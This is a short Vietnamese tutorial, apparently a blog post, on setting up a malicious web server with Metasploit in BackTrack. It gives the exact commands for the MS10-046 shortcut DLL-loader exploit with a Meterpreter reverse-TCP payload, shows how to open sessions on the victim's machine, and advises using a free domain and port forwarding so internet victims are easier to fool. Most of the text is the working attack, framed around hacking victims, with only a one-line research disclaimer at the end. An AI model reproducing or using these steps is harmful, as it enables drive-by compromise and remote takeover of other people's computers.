Hướng dẫn tạo website chứa virus trong backtrack
Với phương pháp này, nạn nhận chỉ cần click vào đường link hacker gửi tới là dính virus, hacker không cần phải dụ dỗ nạn nhân thực thi con virus nữa. quản lý các sessisons cũng đơn giản hơn.
Trong bài viết trước mình đã hướng dẫn cách tạo một con backdoor rồi, nên nếu ai có từng làm rồi thì sang bài viết này sẽ đơn giản hơn. Mình cũng không nói chi tiết hơn về các câu lệnh trong bài viết này, nếu muốn biết chi tiết thì các bạn vui lòng đọc bài này để biết chi tiết từng bước.
Đầu tiên trong terminal, chạy lệnh “msfconsole”
Tiếp theo gõ lệnh
use exploit/windows/browers/ms10_046_shortcut_icon_dllloader
Tiếp theo chạy 3 lệnh sau để set backdoor trên webserver (chính là máy backtrack) và host nhận thông tin trả về
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.3
set LHOST 192.168.1.3
(192.168.1.3 là địa chỉ IP máy backtrack)
Việc kế tiếp chỉ cần chạy lệnh “exploit” là xong
Mình qua máy ảo xp, bật trình duyệt lên và nhập địa chỉ IP của máy backtrack vào
Máy xp sau khi truy cập địa chỉ IP của máy backtrack thì sau khoảng 2,3 giây tùy vào tốc độ đường truyền là nó sẽ tự động tạo 2 file kết nối trên máy hacker
Lúc này chuyển sang máy backtrack, ta sẽ thấy có 1 session kết nối tới máy backtrack, lúc này chỉ việc Ctr + C để ngắt tiến trình và bắt đầu xâm nhập thôi
Gõ lệnh “sessions -l” để xem danh sach nạn nhân, sau đó gõ lệnh “session -i -1″ để xâm nhập máy nạn nhân giống như trong hình
Các bước còn lại thì các bạn tự tìm hiểu nhé, muốn hack thì phải chịu khó nghiên cứu thôi, nếu chỉ hết thì sẽ không còn cái hay nữa…^^
Nếu muốn biến địa chỉ IP thành một tên miền và cho ra internet để dễ đánh lừa nạn nhân thì các bạn chỉ việc kiếm 1 tên miền free, trỏ về IP pulic, rồi NAT port 80 trên router về IP của máy backtrack là xong.
Chúc các bạn ăn thành công và ăn giỗ vui vẻ..:)
Mình cũng xin nhắc lại, các bài viết của mình chia sẻ với mục đích tìm hiểu nghiên cứu, không khuyến cáo sử dụng vào mục đích xấu, thanks.